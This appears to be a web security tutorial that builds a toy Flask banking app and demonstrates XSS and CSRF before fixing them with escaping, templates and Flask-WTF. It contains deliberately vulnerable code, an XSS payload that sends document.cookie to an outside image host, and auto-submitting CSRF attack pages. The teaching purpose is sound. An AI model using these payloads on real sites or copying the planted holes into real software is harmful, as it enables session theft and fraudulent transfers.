Why not get started with this one-hour free course by Troy Hunt?
You might be able to understand some of the big themes of web security and some of the more common exploits (such as XSS and CSRF) just by being a web user, but you’ve got to understand a lot of technical details before you are truly able to build and deploy secure web applications.
Technically, what we call the “World Wide Web” is a collection of resources available over the global Internet via HTTP.
Unfamiliar with HTTP? Read the Wikipedia article in it. It’s good. In practice, people (should) use HTTPS, which is actually HTTP over TLS. There’s a Wikipedia article on this too.
Also watch this great crash course:
If you read the article or watched the video, or are already an expert, great, let’s summarize what you absolutely must know about HTTP:
┌──────────┬──────────┬───────────┐ │ METHOD │ TARGET │ VERSION │ Status Line, must end with CRLF ├──────────┴──────────┴───────────┤ │ Header1: Value1 │ Zero or more request headers │ Header2: Value2 │ Each line ends with CRLF │ Header3: Value3 │ Must be one EXTRA CRLF at end │ ... │ │ HeaderN: ValueN │ ├─────────────────────────────────┤ │ Body │ Optional Body │ of │ │ the │ │ request │ └─────────────────────────────────┘The method is one of: GET, POST, PUT, PATCH, DELETE, HEAD, CONNECT, OPTIONS, TRACE. The target is a URL or a path to a resource. Version is HTTP/1.0, HTTP/1/1, or HTTP/2.
┌───────────┬──────────────┬──────────┐ │ VERSION │ STATUSCODE │ REASON │ Status Line ├───────────┴──────────────┴──────────┤ │ Header1: Value1 │ Zero or more response headers │ Header2: Value2 │ Each line ends with CRLF │ Header3: Value3 │ Must be one EXTRA CRLF at end │ ... │ │ HeaderN: ValueN │ ├─────────────────────────────────────┤ │ Body │ Optional Body │ of │ │ the │ │ response │ └─────────────────────────────────────┘
HTTP was designed with the advantages of a REST architecture (REpresentational State Transfer), namely:
Many programming languages allow you to write programs that communicate over HTTP:
- JavaScript (Node.js) has several libraries http, http2, and https
- Python has the http library built-in, but most people use the third-party Requests library
- Java has a native HTTP package, but again, third-party solutions are often used in practice.
- Ruby has the net/http package.
- Go has the http package.
We say the program making the requests is a web client and the program making the responses is a web server.
When a web server is built to provide raw data to clients (like weather information, stock data, and so on) we call the server program a web service. But when the client is a web browser and the client and server work together to make an interactive application for people, we call the combined program a web application.
Web services will generally use JSON (or XML or similar) for the majority of their request and response payloads; web apps will respond with a lot of HTML, images and other media. Web apps will make use of web services to fill in parts of their “pages” (or, strictly speaking, “documents”) dynamically.
It’s probably best not to get too hung up on the differences between web apps and web services.
HTTP is stateless, so how does one “stay logged in” or preserve a shopping cart from page to page to page? The answer is cookies.
If a user makes a request to shop.example.com, the server can send a cookie in a response. The cookie has information (key-value pairs, generally) with information about the user’s session. The web browser will send the cookie back on the next request. Cookies can store anything. Typically you will see authentication tokens and shopping-cart state (or ids).
“The” SOP is more or less a set of rules that browsers put in place to restrict the way scripts downloaded form one origin (host + path + port) access or manipulate content from another origin.
The precise rules are pretty lengthy, and there are exceptions and slight differences so get the details at: Wikipedia, MDN, W3C, and PortSwigger.
Now, let’s switch to web security, namely, how to build and defend applications and services deployed on the web. The topic is massive. But there’s help. The Open Web Application Security Project® (OWASP) is a nonprofit foundation providing information, tools, resources, community, conferences, training, and education for everyone.
Many security principles are web-specific. Here are some big ones:
The Web Security Checklist from Probe.ly
This checklist can be useful.
It’s good to familiarize yourself, with, or review, the most common and well-known vulnerabilities and attacks that are highly specific to web applications. Three of the big ones are:
A few other attacks common in web applications, are actually specific to networking or TCP (SYN Flooding, etc.), or are things like SQL Injection which could happen outside the web. But they still fall under the umbrella of “web security.” For a much larger overview of web security topics and specific vulnerabilities and defenses:
What tools and techniques are available to front-end developers?
What tools and techniques are available to back-end developers?
Your server should not accept any HTTP traffic at all. Only do HTTPS.
Cross-Origin Resource Sharing is a mechanism to allow a browser to access to certain resources from domains other than that from which the script making the access request was loaded. It gets setup server-side. It’s complex. Read the details at: Wikipedia, MDN, and PortSwigger.
The HTTP standard specifies that one of its headers be called Authorization and its value can be used for, get this, authentication. I don’t make the rules.
The authentication schemes to know are Basic, Digest, and Bearer. There are others, of course. There is a good write up of the basics at MDN. Also see a nice overview of authentication vulnerabilities at PortSwigger.
It’s not considered a good idea to pass one’s username and password along on every single request. Instead, one sends in the credentials to an auth server and gets back a token to use on subsequent requests. To see why this is the way to go, read about tokens at Wikipedia, okta, JWT Hone page, and Auth0,
Most folks know of OAuth as that thing that happens when you log in to some site "through Google" or "through GitHub" or "through Twitter." Find details at Wikipedia and PortSwigger.
If you have a web service, it is your duty to expose services via HTTPS, which is just a fancy way of saying HTTP over a transport layer which encrypts the HTTP stream. Having encryption applied at the transport layer is amazing, since that means that every web server does not have to do the encryption in app. Server administrators do have to set things up right, getting certificates in place and all that. Find out more at Wikipedia and MDN
TLS 1.2+ Please
TLS replaces SSL, so SSL is obsolete. Also TLS versions prior to 1.2 should no longer be used.
There is so much to test in a web app: front end, back end, communications, authentication, you name it. As the security concerns are massive, a number of tools and best practices have evolved for security-focused testing on the web.
The most famous suite of tools is probably Burp Suite by the company PortSwigger. There is an article about what Burp Suite is at Geeks For Geeks. PortSwigger also has a nice collection of research articles in web security.
Let’s checkout how the Flask Web Framework for Python helps us avoid the three most common web attacks. First, visit the Flask project page and read the User Guide at least through the Tutorial. We’re going to create a small web application with the following endpoints that will simulate a banking app:
We want to be careful not to allow XSS attacks that could happen if we put script elements in the withdraw memo field. Also we want to be careful not to allow CSRF attacks by an attacker tricking us into doing a POST /withdraw
from a malicious fake page or nasty link in a phishing email. We’ll be careful to prevent SQL Injection when looking up the email and password during login.
Fundamentals First
We will do this case study in two phases. In the first phases we will implement defenses using only the most basic tools available in Python and Flask. This means our CSRF protection will come from manually doing double-submit cookies and SQL Injection protection with prepared statements. In the second phase, we’ll bring in the heavyweight external libraries Flask-WTF (for CSRF protection) and Flask-Login that automatically handles a lot of login concerns.
In real apps, you should go straight to using the powerful libraries! We are only showing low-level defenses for educational purposes only; it’s too risky to do this on your own in practice.
Here are the steps (Notes here are for Unix-based systems, not Windows; however, some of the Windows commands needed are found on the Installation page in the Flask docs.)
python3 -m venv env
. env/bin/activate
pip install Flask Flask-WTF PyJWT passlib
. (Weirdly, you might have to deactivate the virtual environment and reeactivate it after this. Might as well do that to be safe.)export FLASK_ENV=development
(to enable automatic server restart after code changes)
from flask import Flask, request, make_response, redirect app = Flask(__name__) # DANGER WARNING: Even though Flask lets us manufacture and return # our own strings we should never do this. We are illustrating # horrible code on purpose to show what vulnerabilities look like. # Don't ever do this in practice. @app.route("/", methods=['GET']) def home(): return """ <p>This is just a fake form for now, submit anything</p> <form method="post" action="/login"> <p>Email: <input type="text" name="email"></p> <p>Password: <input type="password" name="password"></p> <p><input type="submit" value="Login"></p></form>""" @app.route("/login", methods=["POST"]) def login(): # For now, we're just getting started, so assume login is # always okay and just deliver a fake authentication token. # We'll do real auth later after the XSS and CSRF demos. request.form.get("email") request.form.get("password") response = make_response(redirect("/dashboard")) response.set_cookie("auth_token", "Fake-token-for-now") return response, 303 @app.route("/dashboard", methods=['GET']) def dashboard(): return """ <h1>What would you like to do today?</h1> <p><a href="/details?account=100">Savings account details</a></p> <p><a href="/details?account=998">Checking account details</a></p> <p><a href="/transfer">Transfer</a></p>""" @app.route("/details", methods=['GET', 'POST']) def details(): account_number = request.args['account'] # DANGER DANGER BAD BAD BAD XSS VULNERABILITY return f""" <h1>Details for Account {account_number}</h1> <p>Details coming soon <p><a href="/dashboard">Back to Dashboard</a></p>""" @app.route("/transfer", methods=["GET"]) def transfer(): return """ <h1>Make a Transfer</h1> <p>Transfer implementation coming soon</p> <p><a href="/dashboard">Back to Dashboard</a></p>"""
flask run
localhost:5000
and see the login form. Submit to go to the dashboard.%3Cscript%3Ealert%281%29%3C%2Fscript%3EBAM! OH SNAP! IT IS VULNERABLE!
%3Cscript%3Edocument.write%28%22%3Cimg+src%3D%27https:%2F%2Fcs.lmu.edu%2F~ray%2Fimages%2Fdogfire.png%3Fc%3D%22%2Bdocument.cookie%2B%22%27%3E%22%29%3C/script%3ETry it by pasting this over the account number in the browser address bar. Look in the Network tab to see the auth token send to the attacker’s server. (Here we assume the attacker logs all requests so it can easily grab the stolen cookie.) The dog fire picture was a very blatant way to tell the user they’ve been pwned, but in reality the malicious actors are more quiet; their image would be a transparent pixel so the victim doesn’t really know anything is wrong...yet.
<html> <body> <h1>Welcome to the Cat Pictures Website</h1> <p> <a href="http://localhost:5000/details?account=%3Cscript%3Edocument.write%28%22%3Cimg+src%3D%27https:%2F%2Fcs.lmu.edu%2F~ray%2Fimages%2Fdogfire.png%3Fc%3D%22%2Bdocument.cookie%2B%22%27%3E%22%29%3C/script%3E"> Browse the Gallery! </a> </p> </body> </html>
from markupsafe import escape
at the top and changing all the routes that return strings to return escape(the_string)
as needed. Try it out if you wish, and note that the attack has been defeated.markupsafe
isn’t the most general or best solution. In real life we should never compose HTML directly like this; instead, our HTML should always be created by Flask templates. Create the following files:
templates/login.html
<p>This is just a fake form for now, submit anything</p> <form method="post" action="/login"> <p>Email: <input type="text" name="email" /></p> <p>Password: <input type="password" name="password" /></p> <p><input type="submit" value="Login" /></p> </form>
templates/dashboard.html
<h1>What would you like to do today?</h1> <p><a href="/details?account=100">Savings account details</a></p> <p><a href="/details?account=998">Checking account details</a></p> <p><a href="/transfer">Transfer</a></p>
templates/details.html
<h1>Details for Account {{account_number}}</h1> <p>Details coming soon</p> <p><a href="/dashboard">Back to Dashboard</a></p>
templates/transfer.html
<h1>Make a Transfer</h1> <p>Transfer implementation coming soon</p> <p><a href="/dashboard">Back to Dashboard</a></p>
from flask import Flask, request, make_response, redirect, render_template app = Flask(__name__) @app.route("/", methods=['GET']) def home(): return render_template("login.html") @app.route("/login", methods=["POST"]) def login(): # For now, we're just getting started, so assume login is # always okay and just deliver a fake authentication token. # We'll do real auth later after the XSS and CSRF demos. request.form.get("email") request.form.get("password") response = make_response(redirect("/dashboard")) response.set_cookie("auth_token", "Fake-token-for-now") return response, 303 @app.route("/dashboard", methods=['GET']) def dashboard(): return render_template("dashboard.html") @app.route("/details", methods=['GET', 'POST']) def details(): account_number = request.args['account'] return render_template("details.html", account_number=account_number) @app.route("/transfer", methods=["GET"]) def transfer(): return render_template("transfer.html")
and note that the template system automatically prevents XSS !
POST /login
properly. To login, we check a database to see if there is a user with the given email and a password hash that matches the hash of the submitted password. If such a user exists, we will generate a token that proves the user is authenticated for subsequent calls, put that in a cookie, then redirect to the GET /dashboard
route. Let’s create a database. In real life, we’d use a secure well-administered database. We’re all students here, so we can use SQLite, a built-in database included with Python, and store this on our development machine. This is totally fine for learning.
Let’s use this little script to create a database and populate it with two users, Alice and Bob, who aren’t the most tech savvy and they both use the password 123456. Our user table will store their email address as the key, and their print name. We will hash passwords with PBKDF2 SHA256 for this, which is in passlib
. Call this script bin/createdb.py
import sqlite3 from passlib.hash import pbkdf2_sha256 con = sqlite3.connect('bank.db') cur = con.cursor() cur.execute(''' CREATE TABLE users ( email text primary key, name text, password text)''') cur.execute( "INSERT INTO users VALUES (?, ?, ?)", ('alice@example.com', 'Alice Xu', pbkdf2_sha256.hash("123456"))) cur.execute( "INSERT INTO users VALUES (?, ?, ?)", ('bob@example.com', 'Bobby Tables', pbkdf2_sha256.hash("123456"))) con.commit() con.close()
Note we are using bound parameters and not string interpolating anything into our SQL. We’re not even going to demonstrate SQL Injection here. We did that earlier in this class. Let’s just jump right to the bound-parameters thing. (Irl, we’d probably use a programmatic database interface which is even better, but bound paramters will do for now.)
$ sqlite3 bank.db SQLite version 3.36.0 2021-06-18 18:58:49 Enter ".help" for usage hints. sqlite> select * from users; alice@example.com|Alice Xu|$pbkdf2-sha256$29000$e8/5H8M4J4Twvtc6x5gTYg$N4xxoh3lOsJdvnjhlXFIu7ZMg3AD7xTMQxQSqQPYRC4 bob@example.com|Bobby Tables|$pbkdf2-sha256$29000$9x4jRMjZWwtBCME4x1hrrQ$9XTlZjB0IcU5uKUpzdlJQhV58MxOO7gcQVL5ZsDA2n0 sqlite> .quit
Note that Passlib’s pbkdf2 hash function automatically salted the hashes!
/
. To handle this, we write a logged_in
function which will check the auth token in the cookie and if it is verified, we’ll put the email in the Flask session variable g
. Create the service in the file user_service.py:
import sqlite3 from datetime import datetime, timedelta from passlib.hash import pbkdf2_sha256 from flask import request, g import jwt SECRET = 'bfg28y7efg238re7r6t32gfo23vfy7237yibdyo238do2v3' def get_user_with_credentials(email, password): try: con = sqlite3.connect('bank.db') cur = con.cursor() cur.execute(''' SELECT email, name, password FROM users where email=?''', (email,)) row = cur.fetchone() if row is None: return None email, name, hash = row if not pbkdf2_sha256.verify(password, hash): return None return {"email": email, "name": name, "token": create_token(email)} finally: con.close() def logged_in(): token = request.cookies.get('auth_token') try: data = jwt.decode(token, SECRET, algorithms=['HS256']) g.user = data['sub'] return True except jwt.InvalidTokenError: return False def create_token(email): now = datetime.utcnow() payload = {'sub': email, 'iat': now, 'exp': now + timedelta(minutes=60)} token = jwt.encode(payload, SECRET, algorithm='HS256') return token
and modify app.py as needed:
from flask import Flask, request, make_response, redirect, render_template, g from user_service import get_user_with_credentials, logged_in app = Flask(__name__) @app.route("/", methods=['GET']) def home(): if not logged_in(): return render_template("login.html") return redirect('/dashboard') @app.route("/login", methods=["POST"]) def login(): email = request.form.get("email") password = request.form.get("password") user = get_user_with_credentials(email, password) if not user: return render_template("login.html", error="Invalid credentials") response = make_response(redirect("/dashboard")) response.set_cookie("auth_token", user["token"]) return response, 303 @app.route("/dashboard", methods=['GET']) def dashboard(): if not logged_in(): return render_template("login.html") return render_template("dashboard.html", email=g.user) @app.route("/details", methods=['GET', 'POST']) def details(): if not logged_in(): return render_template("login.html") account_number = request.args['account'] return render_template("details.html", account_number=account_number) @app.route("/transfer", methods=["GET"]) def transfer(): if not logged_in(): return render_template("login.html") return render_template("transfer.html")
and allow the login page to display the error. The new templates/login.html should be:
{% if error %} <p style="color: red">{{ error }}</p> {% endif %} <form method="post" action="/login"> <p>Email: <input type="text" name="email" /></p> <p>Password: <input type="password" name="password" /></p> <p><input type="submit" value="Login" /></p> </form>
<p><a href="/logout">Logout</a></p>
And we will implement the new handler on the server to clear the cookie:
@app.route("/logout", methods=['GET']) def logout(): response = make_response(redirect("/dashboard")) response.delete_cookie('auth_token') return response, 303
Practice with this.
<p>Hi, {{ user }}</p> <h1>Details for Account {{account_number}}</h1> <p>Your balance is {{ balance }}</p> <p><a href="/dashboard">Back to Dashboard</a></p>
and the transfer template:
<h1>Make a Transfer</h1> <form method="POST" action="/transfer"> <pre> From <input name="from" /> To <input name="to" /> Amount <input name="amount" /> <input type="submit" value="Transfer"> </pre> <-- WARNING WARNING THERE IS A CSRF VULNERABILITY HERE!!! --> <-- WE WILL BE FIXING IT LATER. --> </form> <p><a href="/dashboard">Back to Dashboard</a></p>
import sqlite3 from passlib.hash import pbkdf2_sha256 con = sqlite3.connect('bank.db') cur = con.cursor() cur.execute(''' CREATE TABLE accounts ( id text primary key, owner text, balance integer, foreign key(owner) references users(email))''') cur.execute( "INSERT INTO accounts VALUES (?, ?, ?)", ('100', 'alice@example.com', 7500)) cur.execute( "INSERT INTO accounts VALUES (?, ?, ?)", ('190', 'alice@example.com', 200)) cur.execute( "INSERT INTO accounts VALUES (?, ?, ?)", ('998', 'bob@example.com', 1000)) con.commit() con.close()
import sqlite3 def get_balance(account_number, owner): try: con = sqlite3.connect('bank.db') cur = con.cursor() cur.execute(''' SELECT balance FROM accounts where id=? and owner=?''', (account_number, owner)) row = cur.fetchone() if row is None: return None return row[0] finally: con.close() def do_transfer(source, target, amount): try: con = sqlite3.connect('bank.db') cur = con.cursor() cur.execute(''' SELECT id FROM accounts where id=?''', (target,)) row = cur.fetchone() if row is None: return False cur.execute(''' UPDATE accounts SET balance=balance-? where id=?''', (amount, source)) cur.execute(''' UPDATE accounts SET balance=balance+? where id=?''', (amount, target)) con.commit() return True finally: con.close()
Here are the updates necessary for two new endpoints in app.py:
@app.route("/details", methods=['GET']) def details(): if not logged_in(): return render_template("login.html") account_number = request.args['account'] return render_template( "details.html", user=g.user, account_number=account_number, balance = get_balance(account_number, g.user))
@app.route("/transfer", methods=["POST"]) def transfer(): if not logged_in(): return render_template("login.html") source = request.form.get("from") target = request.form.get("to") amount = int(request.form.get("amount")) if amount < 0: abort(400, "NO STEALING") if amount > 1000: abort(400, "WOAH THERE TAKE IT EASY") available_balance = get_balance(source, g.user) if available_balance is None: abort(404, "Account not found") if amount > available_balance: abort(400, "You don't have that much") if do_transfer(source, target, amount): pass # TODO GIVE FEEDBACK else: abort(400, "Something bad happened") response = make_response(redirect("/dashboard")) return response, 303
abort
.
<html> <body> <h1>Welcome to the Cat Pictures Website</h1> <form action="localhost:5000/transfer" method="POST"> <input type="amount" name="amount" value="100" /> <input type="hidden" name="from" value="998" /> <input type="hidden" name="to" value="666" /> </form> <script> document.forms[0].submit(); </script> </body> </html>
from flask_wtf.csrf import CSRFProtect app.config['SECRET_KEY'] = 'yoursupersecrettokenhere' csrf = CSRFProtect(app)
Make sure to generate a good, cryptographically secure random token. Next, add to each form:
<input type="hidden" name="csrf_token" value="{{ csrf_token() }}" />
Now when you go to localhost:9000/evil.html
, the output page says: ”Bad Request / The CSRF token is missing.“
FlaskForm
class, which makes validation super nice. We’ll leave it to you to check out the documentation and rewrite our example using proper Flask form handling. Enjoy.We’ve covered: